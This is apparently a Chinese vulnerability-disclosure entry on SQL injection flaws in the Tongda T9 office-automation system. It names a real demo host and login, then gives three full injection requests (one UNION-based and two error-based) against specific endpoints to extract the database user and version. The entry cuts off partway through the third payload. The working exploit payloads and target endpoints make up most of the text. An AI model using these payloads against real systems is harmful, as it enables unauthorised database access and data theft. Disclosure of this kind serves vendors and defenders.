通达T9 oa系统sql注射12处打包(demo站点root权限)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: T9智能管理平台是基于B/S架构,灵活、稳定、安全、高性能的办公系统。采用自主研发的引擎技术,提供强大的工作流和公文流程管理功能,可完全根据客户需求定制办公门户平台。 ### 详细说明: 测试地址http://t9.go2oa.com/t9/core/frame/webos/index.jsp 测试帐号及密码oa/无 注入1: 漏洞分析: url: http://t9.go2oa.com/t9/t9/core/funcs/message/weixun_share/act/T9WeiXunShareAct/getWeiXunById.act postdata: wxid=110' UNION ALL SELECT NULL,CONCAT(user(),':',version()),NULL,NULL,NULL,NULL,NULL# 注入2: url: http://t9.go2oa.com/t9/t9/core/funcs/diary/act/T9DiaryAct/deleteDia.act postdata: diaIds=2 AND (SELECT 4200 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN (4200=4200) THEN 1 ELSE 0 END)),0x716f697271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) 注入3: url: http://t9.go2oa.com/t9/t9/core/funcs/email/act/T9InnerEMailAct/deletM.act?bodyId=3 AND (SELECT 6356 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN (6356=6356) THEN 1 ELSE 0 END)),0x71706d6d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&deType=4&deType=4 [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息